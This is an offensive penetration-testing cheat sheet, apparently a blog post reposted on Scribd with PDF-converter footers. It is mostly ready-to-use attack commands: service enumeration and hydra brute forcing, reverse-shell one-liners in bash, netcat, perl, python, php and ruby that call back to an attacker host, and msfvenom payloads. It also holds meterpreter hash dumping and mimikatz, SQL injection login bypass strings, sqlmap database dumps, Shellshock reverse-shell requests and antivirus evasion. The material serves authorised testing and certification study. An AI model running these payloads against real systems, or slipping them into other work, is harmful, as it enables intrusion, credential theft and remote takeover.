100% found this document useful (3 votes)
479 views37 pages

Pentesting Cheatsheet

The document is a pentesting cheat sheet that provides concise summaries of commands and techniques for various phases of a penetration test including enumeration, exploitation, privilege escalation, and post-exploitation. It lists commands for scanning systems, enumerating services, exploiting vulnerabilities, gaining remote shell access, and escalating privileges on Windows and Linux systems. The cheat sheet also provides resources for further pentesting education and links to additional tools.

Uploaded by

Rizwan Arfin
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
100% found this document useful (3 votes)
479 views37 pages

Pentesting Cheatsheet

The document is a pentesting cheat sheet that provides concise summaries of commands and techniques for various phases of a penetration test including enumeration, exploitation, privilege escalation, and post-exploitation. It lists commands for scanning systems, enumerating services, exploiting vulnerabilities, gaining remote shell access, and escalating privileges on Windows and Linux systems. The cheat sheet also provides resources for further pentesting education and links to additional tools.

Uploaded by

Rizwan Arfin
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 37

root@Hausec

sudo apt-get install hacking-skills

 MENU 

Pentesting Cheatsheet

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
In addition to my own contributions, this compilation is possible by other compiled
cheatsheets by g0tmilk, highon.co ee, and pentestmonkey, as well as a few others listed
at the bottom. My personal Work owy Pentesting list is found here. The Work owy list is
an aggregate of every bit of enumeration I’ve done from all the Vulnhub writeups I did.

Pentesting Cheat Sheet


Table of Contents
Enumeration
General Enumeration

FTP Enumeration (21)

SSH (22)

SMTP Enumeration (25)

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Finger Enumeration (79)

Web Enumeration (80/443)

Pop3 (110)

RPCBind (111)

SMB\RPC Enumeration (139/445)

SNMP Enumeration (161)

Oracle (1521)

Mysql Enumeration (3306)

DNS Zone Transfers

Mounting File Shares

Fingerprinting

Exploit Research

Compiling Exploits

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Packet Inspection

Password Cracking

Bruteforcing

Shells & Reverse Shells


SUID C Shells

TTY Shell

Spawn Ruby Shell

Netcat. 7

Telnet Reverse Shell

PHP

Bash

Perl

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Meterpreter
Windows reverse meterpreter payload

Windows VNC Meterpreter payload

Linux Reverse Meterpreter payload

Meterpreter Cheat Sheet

Meterpreter Payloads

Binaries

Web Payloads

Scripting Payloads

Shellcode

Handlers

Powershell

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 

Privilege Escalation
Linux

Windows

Command Injection
File Traverse

Test HTTP options using curl

Upload le using CURL to website with PUT option available. 11

Transfer le

Activate shell le

SQLInjections
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Injections

SQLMap

Miscellaneous

Tunneling: 11

AV Bypass: 12

Web hosts. 12

Php Meterpreter Shell 

Reverse shell using interpreters

Shellshock

Resources & Links


Windows Privilege Escalation

SQL & Apache Log paths

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Recon

Cheat Sheets (Includes scripts)

Meterpreter Stu

Proxy Chaining

Huge collection of common commands and scripts as well as general pentest info

Scripts

Pentester Bookmarks, huge collection of blogs, forums, and resources

Pentest Checklist

OSCP Writeups, blogs, and notes

Enumeration
General Enumeration:

  nmap -vv -Pn -A -sC -sS -T 4 -p- 10.0.0.1 

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
nmap -v -sS -A -T4 x.x.x.x //  Verbose, SYN Stealth, Version info, and scripts against
services.

nmap -v -p 445 --script=smb-check-vulns --script-args=unsafe=1 192.168.1.X  // Nmap script to


scan for vulnerable SMB servers – WARNING: unsafe=1 may cause knockover

netdiscover -r 192.168.1.0/24

FTP Enumeration (21):

nmap –script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-
cve2010-4221,tftp-enum -p 21 10.0.0.1

SSH (22):

nc INSERTIPADDRESS 22

SMTP Enumeration (25):

nmap –script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-
1720,smtp-vuln-cve2011-1764 -p 25 10.0.0.1

nc -nvv INSERTIPADDRESS 25

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
telnet INSERTIPADDRESS 25

Finger Enumeration (79):

Download script and run it with a wordlist: http://pentestmonkey.net/tools/user-


enumeration/ nger-user-enum

Web Enumeration (80/443):

dirbuster (GUI)

nikto –h 10.0.0.1

Pop3 (110):

telnet INSERTIPADDRESS 110

USER pelle@INSERTIPADDRESS

PASS admin

or:

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
USER pelle

PASS admin

RPCBind (111):

rpcinfo –p x.x.x.x

SMB\RPC Enumeration (139/445):

enum4linux –a 10.0.0.1

nbtscan x.x.x.x // Discover Windows / Samba servers on subnet, nds Windows MAC
addresses, netbios name and discover client workgroup / domain

py 192.168.XXX.XXX 500 50000 dict.txt

python /usr/share/doc/python-impacket-doc/examples/samrdump.py 192.168.XXX.XXX

nmap IPADDR --script smb-enum-domains.nse,smb-enum-groups.nse,smb-enum-processes.nse,smb-


enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse,smb-ls.nse,smb-mbenum.nse,smb-
os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-
stats.nse,smb-system-info.nse,smb-vuln-con cker.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-
061.nse,smb-vuln-regsvc-dos.nse

smbclient -L INSERTIPADDRESS

smbclient //INSERTIPADDRESS/tmp

smbclient INSERTIPADDRESS ipc$ -U john

SNMP Enumeration (161):

snmpwalk -c public -v1 10.0.0.0

snmpcheck -t 192.168.1.X -c public

onesixtyone -c names -i hosts

python /usr/share/doc/python-impacket-doc/examples/samrdump.py SNMP 192.168.X.XXX

nmap -sT -p 161 192.168.X.XXX/254 -oG snmp_results.txt

snmpenum -t 192.168.1.X

Oracle (1521):

tnscmd10g version -h INSERTIPADDRESS

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
tnscmd10g status -h INSERTIPADDRESS

Mysql Enumeration (3306):

nmap -sV -Pn -vv 10.0.0.1 -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-


empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-
cve2012-2122

DNS Zone Transfers:

nslookup -> set type=any -> ls -d blah.com

dig axfr blah.com @ns1.blah.com

dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml // Recon

Mounting File Share

showmount -e IPADDR

mount 192.168.1.1:/vol/share /mnt/nfs  -nolock //  mounts the share to /mnt/nfs without


locking it

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
mount -t cifs -o username=user,password=pass, domain=blah //192.168.1.X/share-name /mnt/cifs
// Mount Windows CIFS / SMB share on Linux at /mnt/cifs if you remove password it
will prompt on the CLI (more secure as it wont end up in bash_history)

net use Z: \\win-server\share password  /user:domain\janedoe /savecred /p:no //  Mount a


Windows share on Windows from the command line

apt-get install smb4k –y //  Install smb4k on Kali, useful Linux GUI for browsing SMB
shares

Fingerprinting:  Basic versioning / nger printing via


displayed banner

nc -v 192.168.1.1 25

telnet 192.168.1.1 25

Exploit Research

searchsploit windows 2003 | grep -i local //  Search exploit-db for exploit, in this example
windows 2003 + local esc

Compiling Exploits
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
gcc -o exploit exploit.c //  Compile C code, add –m32 after ‘gcc’ for compiling 32 bit code
on 64 bit Linux

i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe //  Compile windows .exe on Linux

Packet Inspection:

tcpdump tcp port 80 -w output.pcap -i eth0 // tcpdump for port 80 on interface eth0,
outputs to output.pcap

Password Cracking
Use hash-identi er to determine the hash type.

https://hashkiller.co.uk

Paste the entire /etc/shadow le in a test le and run john with the text le after john.

john hashes.txt

hashcat -m 500 -a 0 -o output.txt –remove hashes.txt /usr/share/wordlists/rockyou.txt

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Bruteforcing:

hydra 10.0.0.1 http-post-form


“/admin.php:target=auth&mode=login&user=^USER^&password=^PASS^:invalid” -P
/usr/share/wordlists/rockyou.txt -l admin

hydra -l admin -P /usr/share/wordlists/rockyou.txt -o results.txt IPADDR PROTOCOL

hydra -P /usr/share/wordlistsnmap.lst 192.168.X.XXX smtp –V // Hydra SMTP Brute force

Shells & Reverse Shells


SUID C Shells

bin/bash:

int main(void){

setresuid(0, 0, 0);

system(“/bin/bash”);

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
bin/sh:

int main(void){

setresuid(0, 0, 0);

system(“/bin/sh”);

gcc -o suid suid.c

TTY Shell:

python -c 'import pty;pty.spawn("/bin/bash")'

echo os.system('/bin/bash')

/bin/sh –i

execute('/bin/sh') //  LUA

!sh // NMAP

:!bash // Vi

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Spawn Ruby Shell

exec "/bin/sh" // TTY

ruby -rsocket -e'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d

Netcat

nc -e /bin/sh ATTACKING-IP 80

/bin/sh | nc ATTACKING-IP 80

rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0/tmp/p

Telnet Reverse Shell

rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0/tmp/p

telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443

PHP

php -r '$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3 2>&3");'

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
(Assumes TCP uses le descriptor 3. If it doesn’t work, try 4,5, or 6)

Bash

exec /bin/bash 0&0 2>&0

0<&196;exec 196<>/dev/tcp/ATTACKING-IP/80; sh <&196 >&196 2>&196

exec 5<>/dev/tcp/ATTACKING-IP/80 cat <&5 | while read line; do $line 2>&5 >&5; done

# or: while read line 0<&5; do $line 2>&5 >&5; done

bash -i >& /dev/tcp/ATTACKING-IP/80 0>&1

Perl

exec "/bin/sh";

perl —e 'exec "/bin/sh";'

perl -e 'use Socket;$i="ATTACKING-


IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_at
on($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~-
>fdopen($c,w);system$_ while<>;' // Windows

perl -e 'use Socket;$i="ATTACKING-


IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_at
on($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' //
 Windows

Meterpreter
Windows reverse meterpreter payload

set payload windows/meterpreter/reverse_tcp // Windows reverse tcp payload

Windows VNC Meterpreter payload

set payload windows/vncinject/reverse_tcp // Meterpreter Windows VNC Payload

set ViewOnly false

Linux Reverse Meterpreter payload

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
set payload linux/meterpreter/reverse_tcp // Meterpreter Linux Reverse Payload

Meterpreter Cheat Sheet

upload le c:\\windows // Meterpreter upload le to Windows target

download c:\\windows\\repair\\sam /tmp // Meterpreter download le from Windows


target

download c:\\windows\\repair\\sam /tmp // Meterpreter download le from Windows


target

execute -f c:\\windows\temp\exploit.exe // Meterpreter run .exe on target – handy for


executing uploaded exploits

execute -f cmd -c //  Creates new channel with cmd shell

ps // Meterpreter show processes

shell // Meterpreter get shell on the target

getsystem // Meterpreter attempts priviledge escalation the target

hashdump // Meterpreter attempts to dump the hashes on the target

portfwd add –l 3389 –p 3389 –r target // Meterpreter create port forward to target machine

portfwd delete –l 3389 –p 3389 –r target // Meterpreter delete port forward

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
use exploit/windows/local/bypassuac // Bypass UAC on Windows 7 + Set target + arch,
x86/64

use auxiliary/scanner/http/dir_scanner // Metasploit HTTP directory scanner

use auxiliary/scanner/http/jboss_vulnscan // Metasploit JBOSS vulnerability scanner

use auxiliary/scanner/mssql/mssql_login // Metasploit MSSQL Credential Scanner

use auxiliary/scanner/mysql/mysql_version // Metasploit MSSQL Version Scanner

use auxiliary/scanner/oracle/oracle_login //  Metasploit Oracle Login Module

use exploit/multi/script/web_delivery // Metasploit powershell payload delivery module

post/windows/manage/powershell/exec_powershell // Metasploit upload and run powershell


script through a session

use exploit/multi/http/jboss_maindeployer // Metasploit JBOSS deploy

use exploit/windows/mssql/mssql_payload // Metasploit MSSQL payload

run post/windows/gather/win_privs // Metasploit show privileges of current user

use post/windows/gather/credentials/gpp // Metasploit grab GPP saved passwords

load mimikatz -> wdigest // Metasplit load Mimikatz

run post/windows/gather/local_admin_search_enum // Idenitfy other machines that the


supplied domain user has administrative access to

set AUTORUNSCRIPT post/windows/manage/migrate

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Meterpreter Payloads

msfvenom –l //  List options

Binaries

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe

msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho

Web Payloads

msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT= -f raw > shell.php             // PHP

set payload php/meterpreter/reverse_tcp           //Listener

cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php               //
PHP

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp                    //


ASP

msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp // JSP

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war //  WAR

Scripting Payloads

msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py //  Python

msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh //  Bash

msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl //  Perl

Shellcode

For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters.
Msfvenom will output code that is able to be cut and pasted in this language for your
exploits.

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f

msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f

Handlers

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Metasploit handlers can be great at quickly setting up Metasploit to be in a position to
receive your incoming shells. Handlers should be in the following format.

exploit/multi/handler

set PAYLOAD

set LHOST

set LPORT

set ExitOnSession false

exploit -j -z

An example is:   msfvenom exploit/multi/handler -p windows/meterpreter/reverse_tcp LHOST= LPORT=


-f > exploit.extension

Powershell
Execution Bypass

Set-ExecutionPolicy Unrestricted

iex(new-object system.net.webclient).downloadstring(“ le:///C:\example le.ps1”)

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Powershell.exe blocked

Use ‘not powershell’ https://github.com/Ben0xA/nps

PS1 File blocked

iex(new-object system.net.webclient).downloadstring(“ le:///C:\example le.doc”)

Invoke-example le #This allows execution of any le extension

Privilege Escalation
Linux:
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

https://github.com/pentestmonkey/unix-privesc-check

Windows:
https://github.com/pentestmonkey/windows-privesc-check

http://www.fuzzysecurity.com/tutorials/16.html
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/

Command Injection
File Traverse:

website.com/ le.php[?path=/]

Test HTTP options using curl:

curl -vX OPTIONS [website]

Upload le using CURL to website with PUT option


available

curl --upload- le shell.php --url http://192.168.218.139/test/shell.php --http1.0

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Transfer le (Try temp directory if not writable)(wget -O
tells it where to store):

?path=/; wget http://IPADDRESS:8000/FILENAME.EXTENTION;

Activate shell le:

; php -f lelocation.php;

SQLInjections
Common Injections for Login Forms:

admin' --

admin' #

admin'/*

' or 1=1--

' or 1=1#

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
' or 1=1/*

') or '1'='1--

') or ('1'='1—

SQLMap

s qlmap -u http://meh.com --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3


       //  Automated sqlmap scan

sqlmap -u http://INSERTIPADDRESS --dbms=mysql --crawl=3

sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE --level=3 --current-user --current-db


--passwords -- le-read="/var/www/blah.php" // Targeted sqlmap scan

sqlmap -u "http://meh.com/meh.php?id=1" --dbms=mysql --tech=U --random-agent --dump //  Scan


url for union + error based injection with mysql backend and use a random user agent
+ database dump

sqlmap -o -u "http://meh.com/form/" –forms // sqlmap check form for injection

sqlmap -o -u "http://meh/vuln-form" --forms -D database-name -T users –dump // sqlmap dump


and crack hashes for table users on database-name.

sqlmap -- ush session

Flushes the session

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
sqlmap -p user --technique=B

Attempts to exploit the “user” eld using boolean technique.

Miscellaneous
Tunneling:

sshuttle -r [email protected] 10.10.10.0/24

sshuttle is an awesome tunneling tool that does all the hard work for you. It gets rid of the
need for proxy chains. What this command does is tunnels tra c through 10.0.0.1 and
makes a route for all tra c destined for 10.10.10.0/24 through your sshuttle tunnel.

AV Bypass:

root@kali:~/Hyperion-1.0# wine hyperion.exe ../backdoor.exe


../backdoor_mutation.exe (This is a general example of how to evade AV)

Web hosts

python -m SimpleHTTPServer 80 //  Basic HTTP Server

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
service apache2 start //  Starts Apache web server. Place les in /var/www/html to be
able to ‘wget’ them.

Php Meterpreter Shell (Remove Guard bit)

msfvenom -p php/meterpreter/reverse_tcp LHOST=????????? LPORT=6000 R > phpmeterpreter.php

Netcat

Listener: nc -lp PORT

Target: ; nc -e /bin/bash listeneripaddress listenerport | or ncat -v -l -p 7777 -e /bin/bash

Host: cat happy.txt | ncat -v -l -p 5555 Target: ncat localhost 5555 > happy_copy.txt  // download
le via ncat

Reverse shell using interpreters


(http://pentestmonkey.net/cheat-sheet/shells/reverse-
shell-cheat-sheet)

e: python -c python -c 'import


socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",123

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
4));os.dup2(s. leno(),0); os.dup2(s. leno(),1); os.dup2(s. leno(),2);p=subprocess.call(["/bin/sh","-i"]);'

python -c "exec(\"import socket, subprocess;s = socket.socket();s.connect(('127.0.0.1',9000))\nwhile 1:


proc = subprocess.Popen(s.recv(1024), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
stdin=subprocess.PIPE);s.send(proc.stdout.read()+proc.stderr.read())\")"

Shellshock

curl -x TARGETADDRESS -H "User-Agent: () { ignored;};/bin/bash -i >& /dev/tcp/HOSTIP/1234 0>&1"


TARGETADDRESS/cgi-bin/status

curl -x 192.168.28.167:PORT -H "User-Agent: () { ignored;};/bin/bash -i >&


/dev/tcp/192.168.28.169/1234 0>&1" 192.168.28.167/cgi-bin/status

ssh username@IPADDRESS '() { :;}; /bin/bash' //Shellshock over SSH

Resources & Links


Windows Privilege Escalation
http://www.fuzzysecurity.com/tutorials/16.html

https://toshellandback.com/2015/11/24/ms-priv-esc/

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
SQL & Apache Log paths
http://www.itninja.com/blog/view/mysql-and-apache-pro le-log-path-locations

Recon
https://bitvijays.github.io/blog/2015/04/09/learning-from-the- eld-intelligence-gathering/

Cheat Sheets (Includes scripts):


http://pentestmonkey.net/

https://highon.co ee/blog/cheat-sheet/

https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/

Meterpreter Stuff
http://netsec.ws/?p=331

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Proxy Chaining
apt-get install sshuttle

https://github.com/sshuttle/sshuttle

https://github.com/ro 0r/proxychains-ng

https://www.o ensive-security.com/metasploit-unleashed/proxytunnels/

Huge collection of common commands and


scripts as well as general pentest info
https://bobloblaw.gitbooks.io/security/content/

Scripts
https://github.com/rebootuser/LinEnum

https://github.com/mzet-/linux-exploit-suggester

https://github.com/azmatt/windowsEnum

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
https://github.com/leebaird/discover

https://nmap.org/nsedoc/

Pentester Bookmarks, huge collection of blogs,


forums, and resources.
https://code.google.com/archive/p/pentest-bookmarks/wikis/BookmarksList.wiki

https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

Pentest Checklist
http://mateustymbu.xpg.uol.com.br/Bibliography/Pentest_Checklist.pdf

Pentesting Work ow
https://work owy.com/s/FgBl.6qcAQUUqWM

OSCP Writeups, blogs, and notes:


Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
https://xapax.github.io/blog/2017/01/14/OSCP.html

http://www.securitysift.com/o sec-pwb-oscp/

https://netsecfocus.com/topic/32/oscp-like-vulnhub-vms

https://blog.propriacausa.dewp-content/uploads/2016/07/oscp_notes.html

https://localhost.exposed/path-to-oscp/

https://www.reddit.com/r/netsecstudents/comments/5i00w6/my_experience_with_the_os
cp/

https://naterobb.blogspot.com/2017/02/my-experience-with-oscp-to-kick-o -my.html

http://www.securitysift.com/o sec-pwb-oscp/

SHARE THIS:

 Twitter  Facebook 2  Google

Like

Be the first to like this.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
FOLLOW ME ON TWITTER

UP ↑

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD

You might also like